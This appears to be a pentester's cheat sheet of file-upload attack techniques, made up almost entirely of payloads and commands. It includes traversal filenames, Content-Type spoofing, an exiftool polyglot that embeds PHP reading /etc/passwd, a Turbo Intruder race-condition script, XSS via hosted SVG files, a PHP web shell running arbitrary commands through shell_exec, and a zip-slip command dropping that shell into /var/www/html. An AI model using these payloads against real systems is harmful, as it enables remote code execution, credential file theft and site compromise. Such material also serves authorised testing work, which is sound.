Upload Files

Directory Traversal

Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
Content-Disposition: form-data; name="avatar"; filename="..%2exploit.php"

Content-Type

Content-Type to image/jpeg.

Extension blacklist bypass

Content-Disposition: form-data; name="avatar"; filename="exploit.php"

Metadata

exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" example.jpg -o polyglot.php

Race condition

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''<YOUR-POST-REQUEST>'''

    request2 = '''<YOUR-GET-REQUEST>'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

Test metadata

Upload xss_comment_exif_metadata_double_quote.png

Content-Type:image/png - Content-Type: text/html

Reference: https://hackerone.com/reports/964550

If is possible to change src=

Add urls:

• https://angeljuanma.github.io/bug-bounty/evil.svg
• https://angeljuanma.github.io/bug-bounty/xss.svg
• https://angeljuanma.github.io/bug-bounty/xss.html

cannot be displayed

The image "" cannot be displayed because it contains errors.

use:

curl -s -X GET "https://domain.com/uploads/aJEa412rsdfgF" | html2text | mdcat

Zip

cmd.php

<?php
 echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>

Bypass cmd.php.jpeg (- png,etc)

zip -r cmd.zip ../../../../../../../../var/www/html/cmd.php